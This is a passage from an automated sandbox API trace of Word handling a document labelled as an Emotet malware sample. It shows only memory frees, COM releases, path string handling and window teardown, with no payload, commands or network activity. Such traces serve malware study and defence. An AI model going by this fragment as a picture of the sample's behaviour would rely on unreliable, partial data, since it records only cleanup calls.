pv=0x646fcb0) [0236.666] IMalloc:Free (This=0x7fefec05380, pv=0x62b9100) [0236.666] RtlLookupFunctionEntry (in: ControlPc=0xafb6284, ImageBase=0x149eb0, HistoryTable=0x149ed0 | out: ImageBase=0x149eb0, HistoryTable=0x149ed0) returned 0x0 [0236.666] RtlLookupFunctionEntry (in: ControlPc=0xafb6344, ImageBase=0x149eb0, HistoryTable=0x149ed0 | out: ImageBase=0x149eb0, HistoryTable=0x149ed0) returned 0x0 [0236.666] RtlLookupFunctionEntry (in: ControlPc=0xafb6904, ImageBase=0x149eb0, HistoryTable=0x149ed0 | out: ImageBase=0x149eb0, HistoryTable=0x149ed0) returned 0x0 [0236.666] RtlLookupFunctionEntry (in: ControlPc=0xafb69c4, ImageBase=0x149eb0, HistoryTable=0x149ed0 | out: ImageBase=0x149eb0, HistoryTable=0x149ed0) returned 0x0 [0236.666] RtlLookupFunctionEntry (in: ControlPc=0xafb6d6c, ImageBase=0x149eb0, HistoryTable=0x149ed0 | out: ImageBase=0x149eb0, HistoryTable=0x149ed0) returned 0x0 [0236.666] RtlLookupFunctionEntry (in: ControlPc=0xafb6e2c, ImageBase=0x149eb0, HistoryTable=0x149ed0 | out: ImageBase=0x149eb0, HistoryTable=0x149ed0) returned 0x0 [0236.666] IMalloc:Free (This=0x7fefec05380, pv=0xaf61420) [0236.666] IMalloc:Free (This=0x7fefec05380, pv=0xafa6b90) [0236.666] RtlLookupFunctionEntry (in: ControlPc=0x6a19194, ImageBase=0x149eb0, HistoryTable=0x149ed0 | out: ImageBase=0x149eb0, HistoryTable=0x149ed0) returned 0x0 [0236.666] RtlLookupFunctionEntry (in: ControlPc=0x6a19254, ImageBase=0x149eb0, HistoryTable=0x149ed0 | out: ImageBase=0x149eb0, HistoryTable=0x149ed0) returned 0x0 [0236.666] RtlLookupFunctionEntry (in: ControlPc=0x6a19a64, ImageBase=0x149eb0, HistoryTable=0x149ed0 | out: ImageBase=0x149eb0, HistoryTable=0x149ed0) returned 0x0 [0236.666] RtlLookupFunctionEntry (in: ControlPc=0x6a19b24, ImageBase=0x149eb0, HistoryTable=0x149ed0 | out: ImageBase=0x149eb0, HistoryTable=0x149ed0) returned 0x0 [0236.666] RtlLookupFunctionEntry (in: ControlPc=0xafb5d3c, ImageBase=0x149eb0, HistoryTable=0x149ed0 | out: ImageBase=0x149eb0, HistoryTable=0x149ed0) returned 0x0 [0236.666] RtlLookupFunctionEntry (in: ControlPc=0xafb5e04, ImageBase=0x149eb0, HistoryTable=0x149ed0 | out: ImageBase=0x149eb0, HistoryTable=0x149ed0) returned 0x0 [0236.666] IMalloc:Free (This=0x7fefec05380, pv=0xaf61300) [0236.666] IMalloc:Free (This=0x7fefec05380, pv=0x69fc000) [0236.666] IMalloc:Free (This=0x7fefec05380, pv=0x69f94e0) [0236.666] IMalloc:Free (This=0x7fefec05380, pv=0x69fa1d0) [0236.666] RtlLookupFunctionEntry (in: ControlPc=0xafb5fc4, ImageBase=0x149eb0, HistoryTable=0x149ed0 | out: ImageBase=0x149eb0, HistoryTable=0x149ed0) returned 0xafb6010 [0236.666] RtlLookupFunctionEntry (in: ControlPc=0xafb6084, ImageBase=0x149eb0, HistoryTable=0x149ed0 | out: ImageBase=0x149eb0, HistoryTable=0x149ed0) returned 0xafb60d0 [0236.666] RtlLookupFunctionEntry (in: ControlPc=0xafdb864, ImageBase=0x149eb0, HistoryTable=0x149ed0 | out: ImageBase=0x149eb0, HistoryTable=0x149ed0) returned 0xafdb8bc [0236.666] RtlLookupFunctionEntry (in: ControlPc=0xafb5c4c, ImageBase=0x149eb0, HistoryTable=0x149ed0 | out: ImageBase=0x149eb0, HistoryTable=0x149ed0) returned 0xafb5c9c [0236.666] RtlLookupFunctionEntry (in: ControlPc=0xafb5b84, ImageBase=0x149eb0, HistoryTable=0x149ed0 | out: ImageBase=0x149eb0, HistoryTable=0x149ed0) returned 0xafb5bd4 [0236.666] IMalloc:Free (This=0x7fefec05380, pv=0x69fb760) [0236.666] IMalloc:Free (This=0x7fefec05380, pv=0x69faa70) [0236.666] IMalloc:Free (This=0x7fefec05380, pv=0x69fa620) [0236.666] IMalloc:Free (This=0x7fefec05380, pv=0x69fbbb0) [0236.666] IMalloc:Free (This=0x7fefec05380, pv=0x69faec0) [0236.666] IMalloc:Free (This=0x7fefec05380, pv=0xaf1aef0) [0236.667] free (_Block=0x251af00) [0236.667] IMalloc:Free (This=0x7fefec05380, pv=0x682e430) [0236.667] IMalloc:Free (This=0x7fefec05380, pv=0x6884400) [0236.667] IMalloc:Free (This=0x7fefec05380, pv=0x659aad0) [0236.667] IMalloc:Free (This=0x7fefec05380, pv=0xaf287b0) [0236.667] IMalloc:Free (This=0x7fefec05380, pv=0xafff880) [0236.667] IMalloc:Free (This=0x7fefec05380, pv=0xb034bc0) [0236.667] IMalloc:Free (This=0x7fefec05380, pv=0xaf1b5b0) [0236.667] IMalloc:Free (This=0x7fefec05380, pv=0x680ab80) [0236.667] IMalloc:Free (This=0x7fefec05380, pv=0x680a9a0) [0236.667] IMalloc:Free (This=0x7fefec05380, pv=0x68e3820) [0236.667] IMalloc:Free (This=0x7fefec05380, pv=0xaf034d0) [0236.667] IMalloc:Free (This=0x7fefec05380, pv=0x68de9b0) [0236.667] IMalloc:Free (This=0x7fefec05380, pv=0x68dea00) [0236.667] IMalloc:Free (This=0x7fefec05380, pv=0x68dea50) [0236.667] IMalloc:Free (This=0x7fefec05380, pv=0x68e04e0) [0236.667] IMalloc:Free (This=0x7fefec05380, pv=0x68deaa0) [0236.667] IMalloc:Free (This=0x7fefec05380, pv=0x68e2c90) [0236.667] IMalloc:Free (This=0x7fefec05380, pv=0x68deaf0) [0236.667] IMalloc:Free (This=0x7fefec05380, pv=0x68deb40) [0236.667] IMalloc:Free (This=0x7fefec05380, pv=0xaf03650) [0236.667] IMalloc:Free (This=0x7fefec05380, pv=0xafe1e90) [0236.667] IMalloc:Free (This=0x7fefec05380, pv=0x272e080) [0236.667] IMalloc:Free (This=0x7fefec05380, pv=0xafba0c0) [0236.667] IMalloc:Free (This=0x7fefec05380, pv=0x680a880) [0236.667] IMalloc:Free (This=0x7fefec05380, pv=0x680a7c0) [0236.667] IMalloc:Free (This=0x7fefec05380, pv=0x680a760) [0236.667] IMalloc:Free (This=0x7fefec05380, pv=0x680a6a0) [0236.667] IMalloc:Free (This=0x7fefec05380, pv=0x68dedc0) [0236.667] IMalloc:Free (This=0x7fefec05380, pv=0xaf031d0) [0236.667] IMalloc:Free (This=0x7fefec05380, pv=0x68dec30) [0236.667] IMalloc:Free (This=0x7fefec05380, pv=0x680a5e0) [0236.667] IMalloc:Free (This=0x7fefec05380, pv=0x68dec80) [0236.667] IMalloc:Free (This=0x7fefec05380, pv=0x68decd0) [0236.667] IMalloc:Free (This=0x7fefec05380, pv=0x68ded20) [0236.668] IMalloc:Free (This=0x7fefec05380, pv=0x68ded70) [0236.668] IMalloc:Free (This=0x7fefec05380, pv=0x68e1250) [0236.668] IMalloc:Free (This=0x7fefec05380, pv=0x68e0850) [0236.668] IMalloc:Free (This=0x7fefec05380, pv=0xaf03590) [0236.668] IMalloc:Free (This=0x7fefec05380, pv=0x67c2b40) [0236.668] IMalloc:Free (This=0x7fefec05380, pv=0x67c2b60) [0236.668] IMalloc:Free (This=0x7fefec05380, pv=0x67c2aa0) [0236.668] IMalloc:Free (This=0x7fefec05380, pv=0x67c14e0) [0236.668] IMalloc:Free (This=0x7fefec05380, pv=0x67c2c60) [0236.668] IMalloc:Free (This=0x7fefec05380, pv=0x67c2b00) [0236.668] IMalloc:Free (This=0x7fefec05380, pv=0xaf61390) [0236.668] IMalloc:Free (This=0x7fefec05380, pv=0x68deb90) [0236.668] IMalloc:Free (This=0x7fefec05380, pv=0x68e09e0) [0236.668] IMalloc:Free (This=0x7fefec05380, pv=0x69501f0) [0236.668] IMalloc:Free (This=0x7fefec05380, pv=0xafa3770) [0236.668] IMalloc:Free (This=0x7fefec05380, pv=0xaf01fd0) [0236.668] IMalloc:Realloc (This=0x7fefec05380, pv=0x682e1c0, cb=0x0) returned 0x0 [0236.668] IMalloc:Alloc (This=0x7fefec05380, cb=0x0) returned 0x65d6340 [0236.668] IMalloc:Free (This=0x7fefec05380, pv=0x6a59880) [0236.668] IMalloc:Free (This=0x7fefec05380, pv=0x682e280) [0236.668] IMalloc:Free (This=0x7fefec05380, pv=0x682e250) [0236.668] IUnknown:Release (This=0x695ca20) returned 0x3 [0236.668] IMalloc:Free (This=0x7fefec05380, pv=0x6950c00) [0236.668] IMalloc:Free (This=0x7fefec05380, pv=0xaf3dd50) [0236.668] IMalloc:Free (This=0x7fefec05380, pv=0x682e2e0) [0236.668] IMalloc:Free (This=0x7fefec05380, pv=0x258d6c0) [0236.668] IMalloc:Free (This=0x7fefec05380, pv=0xaf60850) [0236.668] IMalloc:Free (This=0x7fefec05380, pv=0x65d6340) [0236.668] IMalloc:Free (This=0x7fefec05380, pv=0x6a58e30) [0236.668] IMalloc:Free (This=0x7fefec05380, pv=0xafa5740) [0236.668] IMalloc:Free (This=0x7fefec05380, pv=0xaf02bd0) [0236.668] IMalloc:Free (This=0x7fefec05380, pv=0xaf02c90) [0236.668] IMalloc:Free (This=0x7fefec05380, pv=0xaf607c0) [0236.669] IMalloc:Free (This=0x7fefec05380, pv=0xafbe410) [0236.669] IMalloc:Free (This=0x7fefec05380, pv=0xafc9a40) [0236.669] IMalloc:Free (This=0x7fefec05380, pv=0xaf3e780) [0236.669] VirtualFree (lpAddress=0x4aa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.669] VirtualFree (lpAddress=0x4ab0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.670] VirtualFree (lpAddress=0x4ac0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.671] VirtualFree (lpAddress=0x4ae0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.671] VirtualFree (lpAddress=0x4af0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.672] VirtualFree (lpAddress=0x4b00000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.672] VirtualFree (lpAddress=0x4b20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.673] VirtualFree (lpAddress=0x4b30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.674] VirtualFree (lpAddress=0x4b40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.674] VirtualFree (lpAddress=0x4cd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.675] VirtualFree (lpAddress=0x4ce0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.675] VirtualFree (lpAddress=0x4cf0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.676] VirtualFree (lpAddress=0x4d00000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.677] VirtualFree (lpAddress=0x4e10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.677] VirtualFree (lpAddress=0x4e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.678] VirtualFree (lpAddress=0x4f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.679] VirtualFree (lpAddress=0x7ca0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.679] VirtualFree (lpAddress=0x7cb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.680] VirtualFree (lpAddress=0x7f00000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.681] VirtualFree (lpAddress=0x7f10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.681] VirtualFree (lpAddress=0x7f20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.682] VirtualFree (lpAddress=0xa680000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.682] VirtualFree (lpAddress=0xa690000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.683] VirtualFree (lpAddress=0xa6a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.683] VirtualFree (lpAddress=0xa6b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.684] VirtualFree (lpAddress=0xa6c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.684] VirtualFree (lpAddress=0xa6d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.684] VirtualFree (lpAddress=0xa880000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.685] VirtualFree (lpAddress=0xa990000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.690] VirtualFree (lpAddress=0xa9c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.690] IMalloc:Free (This=0x7fefec05380, pv=0xaf68180) [0236.690] IMalloc:Free (This=0x7fefec05380, pv=0x682e520) [0236.690] IMalloc:Free (This=0x7fefec05380, pv=0xaf1f520) [0236.690] IUnknown:Release (This=0xaf0b528) returned 0x1 [0236.690] IUnknown:Release (This=0xaf0b6e0) returned 0x1 [0236.690] IMalloc:Realloc (This=0x7fefec05380, pv=0x682e5e0, cb=0x0) returned 0x0 [0236.690] IMalloc:Alloc (This=0x7fefec05380, cb=0x0) returned 0x6a58e30 [0236.690] IMalloc:Free (This=0x7fefec05380, pv=0x6a58da0) [0236.690] IMalloc:Free (This=0x7fefec05380, pv=0x682e4f0) [0236.691] IMalloc:Free (This=0x7fefec05380, pv=0x682e880) [0236.691] IMalloc:Free (This=0x7fefec05380, pv=0xafbddc0) [0236.691] IMalloc:Free (This=0x7fefec05380, pv=0x682e220) [0236.691] IMalloc:Free (This=0x7fefec05380, pv=0x258d3a0) [0236.691] IMalloc:Free (This=0x7fefec05380, pv=0xaf60b20) [0236.691] IMalloc:Free (This=0x7fefec05380, pv=0x6a58e30) [0236.691] IMalloc:Free (This=0x7fefec05380, pv=0x6a59870) [0236.691] IMalloc:Free (This=0x7fefec05380, pv=0xaf3e3a0) [0236.691] IMalloc:Free (This=0x7fefec05380, pv=0xaf02d50) [0236.691] IMalloc:Free (This=0x7fefec05380, pv=0xaf02e10) [0236.691] IMalloc:Free (This=0x7fefec05380, pv=0xaf60a00) [0236.691] IMalloc:Free (This=0x7fefec05380, pv=0xafbfec0) [0236.691] IMalloc:Free (This=0x7fefec05380, pv=0xafc2db0) [0236.691] IMalloc:Free (This=0x7fefec05380, pv=0xafd2e30) [0236.691] VirtualFree (lpAddress=0x42d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.691] VirtualFree (lpAddress=0x42e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.692] VirtualFree (lpAddress=0x4500000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.692] VirtualFree (lpAddress=0x4510000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.693] VirtualFree (lpAddress=0x4520000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.693] VirtualFree (lpAddress=0x4980000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.694] VirtualFree (lpAddress=0x4990000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.694] VirtualFree (lpAddress=0xa9f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.695] VirtualFree (lpAddress=0xaa00000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.695] VirtualFree (lpAddress=0xaa10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.696] VirtualFree (lpAddress=0xceb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.696] VirtualFree (lpAddress=0xcec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.697] VirtualFree (lpAddress=0xcfd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.697] VirtualFree (lpAddress=0xcfe0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.697] VirtualFree (lpAddress=0xcff0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.698] VirtualFree (lpAddress=0xd000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.698] IMalloc:Free (This=0x7fefec05380, pv=0xafc7aa0) [0236.698] IMalloc:Free (This=0x7fefec05380, pv=0x682e4c0) [0236.698] IMalloc:Free (This=0x7fefec05380, pv=0xafdde80) [0236.698] IUnknown:Release (This=0xaf0b528) returned 0x0 [0236.698] IUnknown:Release (This=0xaf0b6e0) returned 0x0 [0236.698] IUnknown:Release (This=0xaf0b688) returned 0x0 [0236.698] IMalloc:Realloc (This=0x7fefec05380, pv=0x68de960, cb=0x0) returned 0x0 [0236.698] IMalloc:Alloc (This=0x7fefec05380, cb=0x0) returned 0x6a59870 [0236.699] IMalloc:Free (This=0x7fefec05380, pv=0x6a598c0) [0236.699] IMalloc:Free (This=0x7fefec05380, pv=0x682e490) [0236.699] IMalloc:Free (This=0x7fefec05380, pv=0x680ab20) [0236.699] IMalloc:Free (This=0x7fefec05380, pv=0xafd34c0) [0236.699] IMalloc:Free (This=0x7fefec05380, pv=0x682e1f0) [0236.699] IMalloc:Free (This=0x7fefec05380, pv=0x258d760) [0236.699] IMalloc:Free (This=0x7fefec05380, pv=0xaf60a90) [0236.699] IMalloc:Free (This=0x7fefec05380, pv=0x6a59870) [0236.699] IMalloc:Free (This=0x7fefec05380, pv=0x6a598a0) [0236.699] IMalloc:Free (This=0x7fefec05380, pv=0xafd2a50) [0236.699] IMalloc:Free (This=0x7fefec05380, pv=0x67c2c40) [0236.699] IMalloc:Free (This=0x7fefec05380, pv=0xaf02ed0) [0236.699] IMalloc:Free (This=0x7fefec05380, pv=0xaf02f90) [0236.699] IMalloc:Free (This=0x7fefec05380, pv=0xaf60c40) [0236.699] IMalloc:Free (This=0x7fefec05380, pv=0x258d2c0) [0236.699] wcsncpy_s (in: _Destination=0x149dc0, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc") returned 0x0 [0236.699] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", cchLength=0x7e | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc") returned 0x7e [0236.699] IMalloc:Alloc (This=0x7fefec05380, cb=0xfe) returned 0x6602a80 [0236.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", cchWideChar=127, lpMultiByteStr=0x6602a80, cbMultiByte=254, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", lpUsedDefaultChar=0x0) returned 127 [0236.699] IMalloc:Free (This=0x7fefec05380, pv=0x6602a80) [0236.699] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc") returned 0 [0236.699] IMalloc:Realloc (This=0x7fefec05380, pv=0x6a598b0, cb=0x0) returned 0x0 [0236.700] IMalloc:Alloc (This=0x7fefec05380, cb=0x0) returned 0x6a598b0 [0236.700] IMalloc:Free (This=0x7fefec05380, pv=0xafb7b30) [0236.700] IMalloc:Free (This=0x7fefec05380, pv=0x682e7f0) [0236.700] IMalloc:Free (This=0x7fefec05380, pv=0xafb7b20) [0236.700] IMalloc:Free (This=0x7fefec05380, pv=0xafb9a70) [0236.700] IMalloc:Free (This=0x7fefec05380, pv=0x682e7c0) [0236.700] IMalloc:Free (This=0x7fefec05380, pv=0x67c2c80) [0236.700] IMalloc:Free (This=0x7fefec05380, pv=0xaf614b0) [0236.700] IMalloc:Free (This=0x7fefec05380, pv=0x6a598b0) [0236.700] IMalloc:Free (This=0x7fefec05380, pv=0xafb7b10) [0236.700] IMalloc:Free (This=0x7fefec05380, pv=0x3f54820) [0236.700] IMalloc:Free (This=0x7fefec05380, pv=0xaf03290) [0236.700] IMalloc:Free (This=0x7fefec05380, pv=0x6877480) [0236.700] IMalloc:Free (This=0x7fefec05380, pv=0x6877560) [0236.701] free (_Block=0x2519af0) [0236.701] free (_Block=0x2519ad0) [0236.701] free (_Block=0x2fcd4e0) [0236.701] free (_Block=0x2fcd500) [0236.701] free (_Block=0x2fcd520) [0236.701] free (_Block=0x2fcd540) [0236.701] free (_Block=0x2fcd560) [0236.701] free (_Block=0x2fcd580) [0236.701] free (_Block=0x2fcdef0) [0236.701] free (_Block=0x2fcd6a0) [0236.701] free (_Block=0x2517a30) [0236.702] free (_Block=0x251cb10) [0236.702] free (_Block=0x251cac0) [0236.702] free (_Block=0x251a390) [0236.702] free (_Block=0x2519b10) [0236.702] GetCurrentThreadId () returned 0x8ec [0236.702] GetCurrentThreadId () returned 0x8ec [0236.702] free (_Block=0x2fcd670) [0236.702] free (_Block=0x2fcd600) [0236.702] free (_Block=0x2519670) [0236.702] free (_Block=0x2519540) [0236.702] free (_Block=0x2519410) [0236.702] free (_Block=0x2519910) [0236.702] free (_Block=0x25197e0) [0236.702] free (_Block=0x2519a90) [0236.702] free (_Block=0x2519930) [0236.702] free (_Block=0x2519ab0) [0236.702] free (_Block=0x251a260) [0236.702] free (_Block=0x25196b0) [0236.702] free (_Block=0x2fcd0e0) [0236.702] free (_Block=0x2fccef0) [0236.702] IMalloc:Free (This=0x7fefec05380, pv=0x6950180) [0236.702] IMalloc:Free (This=0x7fefec05380, pv=0x646f8b0) [0236.703] IMalloc:Free (This=0x7fefec05380, pv=0xaf5e7c0) [0236.703] IMalloc:Free (This=0x7fefec05380, pv=0xaf5e710) [0236.785] SysStringByteLen (bstr="潎浲污") returned 0x6 [0236.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6831f78, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0236.785] SysStringByteLen (bstr="潎浲污") returned 0x6 [0236.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6831f78, cbMultiByte=7, lpWideCharStr=0x6831eb8, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0236.801] free (_Block=0x25186f0) [0236.801] CExposedDocFile::Release () returned 0x2 [0236.801] CExposedDocFile::Release () returned 0x1 [0236.802] IMalloc:Free (This=0x7fefec05380, pv=0x646fa70) [0236.802] IMalloc:Free (This=0x7fefec05380, pv=0x69500a0) [0236.802] GetCurrentThreadId () returned 0x8ec [0236.802] SetCursor (hCursor=0x10007) returned 0x10007 [0236.802] CExposedDocFile::Release () returned 0x0 [0236.802] CExposedDocFile::Release () returned 0x0 [0236.802] free (_Block=0x2518820) [0236.802] free (_Block=0x25188b0) [0236.802] malloc (_Size=0x18) returned 0x2519ab0 [0236.802] free (_Block=0x251c940) [0236.802] free (_Block=0x251c8a0) [0236.802] free (_Block=0x251c710) [0236.802] GetCurrentThreadId () returned 0x8ec [0236.802] GetCurrentThreadId () returned 0x8ec [0236.802] free (_Block=0x251c3a0) [0236.802] IMalloc:Free (This=0x7fefec05380, pv=0xaf61660) [0236.803] IMalloc:Free (This=0x7fefec05380, pv=0x69f9090) [0236.803] IMalloc:Free (This=0x7fefec05380, pv=0x3f5c1a0) [0236.803] IMalloc:Free (This=0x7fefec05380, pv=0x69fd140) [0236.803] IMalloc:Free (This=0x7fefec05380, pv=0x69fccf0) [0236.803] IMalloc:Free (This=0x7fefec05380, pv=0x69fd590) [0236.803] IMalloc:Free (This=0x7fefec05380, pv=0xafc2520) [0236.803] free (_Block=0x251c6b0) [0236.803] IMalloc:Free (This=0x7fefec05380, pv=0x682e700) [0236.803] IMalloc:Free (This=0x7fefec05380, pv=0x682e6a0) [0236.803] IMalloc:Free (This=0x7fefec05380, pv=0xafec870) [0236.803] IMalloc:Free (This=0x7fefec05380, pv=0x67c3ce0) [0236.803] IMalloc:Free (This=0x7fefec05380, pv=0xb003a10) [0236.803] IMalloc:Free (This=0x7fefec05380, pv=0x6958fa0) [0236.803] IMalloc:Free (This=0x7fefec05380, pv=0xaf04550) [0236.803] IMalloc:Free (This=0x7fefec05380, pv=0x67c3d00) [0236.803] IMalloc:Free (This=0x7fefec05380, pv=0xaf04490) [0236.803] IMalloc:Free (This=0x7fefec05380, pv=0x67c4300) [0236.803] IMalloc:Free (This=0x7fefec05380, pv=0x680d880) [0236.803] IMalloc:Free (This=0x7fefec05380, pv=0xafa3a70) [0236.803] IMalloc:Free (This=0x7fefec05380, pv=0xaf03110) [0236.803] IMalloc:Realloc (This=0x7fefec05380, pv=0x682e670, cb=0x0) returned 0x0 [0236.803] IMalloc:Alloc (This=0x7fefec05380, cb=0x0) returned 0x6877930 [0236.803] IMalloc:Free (This=0x7fefec05380, pv=0x6a59a40) [0236.803] IMalloc:Free (This=0x7fefec05380, pv=0x682e850) [0236.803] IMalloc:Free (This=0x7fefec05380, pv=0x682e550) [0236.803] IUnknown:Release (This=0x695ca20) returned 0x0 [0236.803] IMalloc:Free (This=0x7fefec05380, pv=0x69502d0) [0236.803] IMalloc:Free (This=0x7fefec05380, pv=0xafd5300) [0236.804] IMalloc:Free (This=0x7fefec05380, pv=0x67c2ce0) [0236.804] IMalloc:Free (This=0x7fefec05380, pv=0x682e580) [0236.804] IMalloc:Free (This=0x7fefec05380, pv=0x67c1400) [0236.804] IMalloc:Free (This=0x7fefec05380, pv=0xaf61030) [0236.804] IMalloc:Free (This=0x7fefec05380, pv=0x6877930) [0236.804] IMalloc:Free (This=0x7fefec05380, pv=0x6a598d0) [0236.804] IMalloc:Free (This=0x7fefec05380, pv=0x3f54430) [0236.804] IConnectionPoint:Unadvise (This=0x680a400, dwCookie=0x4) returned 0x0 [0236.804] IMalloc:Free (This=0x7fefec05380, pv=0x682e610) [0236.804] IUnknown:Release (This=0x680a400) returned 0x1 [0236.804] IConnectionPoint:Unadvise (This=0x680a340, dwCookie=0x4) returned 0x0 [0236.804] IMalloc:Free (This=0x7fefec05380, pv=0x682e820) [0236.804] IUnknown:Release (This=0x680a340) returned 0x1 [0236.804] IMalloc:Free (This=0x7fefec05380, pv=0xaf03410) [0236.804] IMalloc:Free (This=0x7fefec05380, pv=0xaf03350) [0236.804] IMalloc:Free (This=0x7fefec05380, pv=0xaf60fa0) [0236.804] IMalloc:Free (This=0x7fefec05380, pv=0x6a59a30) [0236.804] wcsncpy_s (in: _Destination=0x14c510, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0236.804] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0236.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x14c440, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0236.804] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0236.810] free (_Block=0x251ab30) [0236.810] free (_Block=0x251ab40) [0236.810] free (_Block=0x251ab50) [0236.810] free (_Block=0x251ab60) [0236.810] free (_Block=0x251ab70) [0236.811] free (_Block=0x251ab80) [0236.811] free (_Block=0x2518680) [0236.811] free (_Block=0x251b360) [0236.811] free (_Block=0x251bb80) [0236.811] free (_Block=0x2519ab0) [0236.811] GetCurrentThreadId () returned 0x8ec [0236.811] GetCurrentThreadId () returned 0x8ec [0236.811] free (_Block=0x2518850) [0236.811] free (_Block=0x2fcd060) [0236.811] free (_Block=0x2fcdf90) [0236.811] free (_Block=0x251c580) [0236.811] free (_Block=0x251c450) [0236.811] free (_Block=0x251af60) [0236.811] free (_Block=0x25185b0) [0236.811] IMalloc:Free (This=0x7fefec05380, pv=0xaf5e5b0) [0236.817] SetCursor (hCursor=0x10007) returned 0x10007 [0237.249] SendMessageA (hWnd=0x101f4, Msg=0x10, wParam=0x0, lParam=0x0) returned 0x0 [0237.249] IsWindow (hWnd=0x0) returned 0 [0237.249] IsWindow (hWnd=0x0) returned 0 [0237.249] IsWindow (hWnd=0x0) returned 0 [0237.249] PeekMessageA (in: lpMsg=0x14f6b0, hWnd=0x101f4, wMsgFilterMin=0x1007, wMsgFilterMax=0x1007, wRemoveMsg=0x3 | out: lpMsg=0x14f6b0) returned 0 [0237.249] DestroyWindow (hWnd=0x101f4) returned 1 [0237.249] free (_Block=0x2fcce50) [0237.249] DeleteDC (hdc=0x49010250) returned 1 [0237.249] GlobalDeleteAtom (nAtom=0xc138) returned 0x0 [0237.250] free (_Block=0x2fccda0) [0237.250] free (_Block=0x2fccd50) [0237.250] free (_Block=0x2fcce20) [0237.250] free (_Block=0x2fccdf0) [0237.250] free (_Block=0x2fcdec0) [0237.250] IMalloc:Free 